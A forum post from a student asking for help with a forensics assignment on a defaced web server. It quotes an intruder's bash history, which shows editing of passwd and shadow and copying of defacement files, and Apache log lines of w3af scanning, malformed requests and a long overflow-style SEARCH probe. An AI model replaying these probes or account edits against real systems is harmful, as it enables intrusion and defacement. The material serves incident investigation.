Hey guys!
Let me start by saying it’s a school assignment, and therefore not a real world situation. Nevertheless, I would appreciate any help I can get.
The company ProvidIT has contacted us, their website has been hacked. Instead of their normal website, it shows “Buy creditcard details online, click here” (cc4u.jpg). A classical defacement.
The following offenses also might have been committed. So it’s our job to find evidence for those offences.
(I had to translate the Dutch law articles, so they might not be 100% acurate legally speaking, but you get the idea)
- Unlawfully accessing automated systems
- Copy or tap (eavesdrop) data after hacking
- Unlawfully access or use system resources of a 3rd party computer
- Deliberate access or impede the use of automated work by sending data (spam)
- Tapping or recording ‘data’
- Placing of recording equipment
- Be in position of equipment capable of tapping
- Publishing eavesdropped data
- Create a malfunction in automated systems on purpose
- On purpose altering data or making data unusable after hacking
- Being responsible for alternating data or making data unusable
We already found a lot of evidence. The problem with the evidence right now: it’s all circumstantial. We connect it to a conclusion of fact yet. The evidence is supposed to be used in a law suit, in which a hacker should get convicted for the facts mentioned above. Therefore, the evidence needs to be there and also preferably irrefutable.
I’m going to provide you with a summary of the things we have found, and what it could mean.
Since I’ve kinda exhausted my knowledge here, I need some help. What I like from you, is to tell me where to look for more evidence. Are there more log files I don’t know about, are there more system locations we need to investigate?
We’re using Cain Live CD, Autospy to investigate the hacked server.
Thanks very much in advance.
-----------
NOTABLE CHANGES / FILES
We found both a passwd and a passwd-, and a shadow and shadow-.
The passwd and shadow (without hyphen) have a user added (cees) when compared to the files with hyphens.
Var/www -> index.html deleted 15-04-2010 (changed 9.57.51)
/var/www/user/index.html -> defaced with cc4u
Cc4u.jpg
Cc4u.com site (URL)
/var/www/user/leo/.bash_history
CONTENTS OF THIS BASH_HISTORY:
Code:
ls
ls -la
cd ..
cd /etcd /etc
cd /etc
ls
nano passwd
cp leo@ServerGroep1/etc/passwd /passwd.back
cp leo@ServerGroep1:/etc/passwd /passwd.back
scp leo@ServerGroep1:/etc/passwd /passwd.back
nano passwd
nano shadow
logout
ls
cp cc4u.jpg /var/www/user/cc4u.jpg
cp index.html /var/www/user/index.html
cd ..
ls
cp index.html /arno/index.html
cd arno
ls -la
touch test
ls -la
rm test
cd ..
cp index.html /arno/index.html
cp index.html arno/index.html
cp cc4u.jpg arno/cc4u.jpg
ls -l
cp cc4u.jpg cees/cc4u.jpg
cp cc4u.jpg ed/cc4u.jpg
cp cc4u.jpg ellen/cc4u.jpg
cp cc4u.jpg peter/cc4u.jpg
cp cc4u.jpg tim/cc4u.jpg
cp cc4u.jpg tom/cc4u.jpg
cp cc4u.jpg ton/cc4u.jpg
cp cc4u.jpg vincent/cc4u.jpg
cp index.html arno/index.html
cp index.html cees/index.html
cp index.html ed/index.html
cp index.html ellen/index.html
cp index.html peter/index.html
cp index.html tim/index.html
cp index.html ton/index.html
cp index.html vincent/index.html
cd ..
logout
Question remaining: which user did this? He’s already in the system at this point.
LOGFILES
/var/log/apache2/acces.log
Several attempts to find errors on the website, execute path traversal, etc.
Code:
10.13.37.10 - - [12/Apr/2010:11:31:43 +0200] "GET / HTTP/1.1" 200 5518 "-" "w3af.sourceforge.net"
W3af => web app attack and audit framework to find and exploit web apps vulnerabilities
http 400 = bad request
http 200 = successful
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "OPTIONS / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "QWERTY / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "OPTIONS / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "TRACE / HTTP/1.0" 200 54 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "GET / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "HEAD / HTTP/1.0" 200 - "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "DELETE / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "PUT / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "POST / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "COPY / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "MOVE / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "MKCOL / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "PROPFIND / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "PROPPATCH / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "LOCK / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "UNLOCK / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "SEARCH / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET /asdfg.hjkl HTTP/1.0" 404 320 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET" 200 5518 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET /" 200 5518 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/999.99" 400 338 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HHTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HHTP/999.99" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / hhtp/999.99" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / http/999.99" 400 338 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/Q.9" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/9.Q" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/Q.Q" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.X" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.10" 400 338 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.1.0" 400 338 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.2" 400 338 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/2.1" 400 338 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1,0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.0X" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP/1.0" 200 5518 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/ HTTP/1.0" 400 338 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET /HTTP/1.0" 404 318 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP /1.0" 501 325 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP/1 .0" 400 338 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP/1. 0" 400 338 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP/1.0 " 200 5518 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "OPTIONS / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "QWERTY / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "OPTIONS / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "TRACE / HTTP/1.0" 200 54 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "GET / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "HEAD / HTTP/1.0" 200 - "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "DELETE / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "PUT / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "POST / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "COPY / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "MOVE / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "MKCOL / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "PROPFIND / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "PROPPATCH / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "LOCK / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "UNLOCK / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "SEARCH / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET /asdfg.hjkl HTTP/1.0" 404 320 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET" 200 5518 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET /" 200 5518 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/999.99" 400 338 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HHTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HHTP/999.99" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / hhtp/999.99" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / http/999.99" 400 338 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/Q.9" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/9.Q" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/Q.Q" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.X" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.10" 400 338 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.1.0" 400 338 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.2" 400 338 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/2.1" 400 338 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1,0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.0X" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP/1.0" 200 5518 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/ HTTP/1.0" 400 338 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET /HTTP/1.0" 404 318 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP /1.0" 501 325 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP/1 .0" 400 338 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP/1. 0" 400 338 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP/1.0 " 200 5518 "-"
10.13.37.10 - - [12/Apr/2010:11:38:58 +0200] "SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 414 362 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:38:59 +0200] "GET /OvCgi/Main/Snmp.exe HTTP/1.1" 404 329 "-" "-"
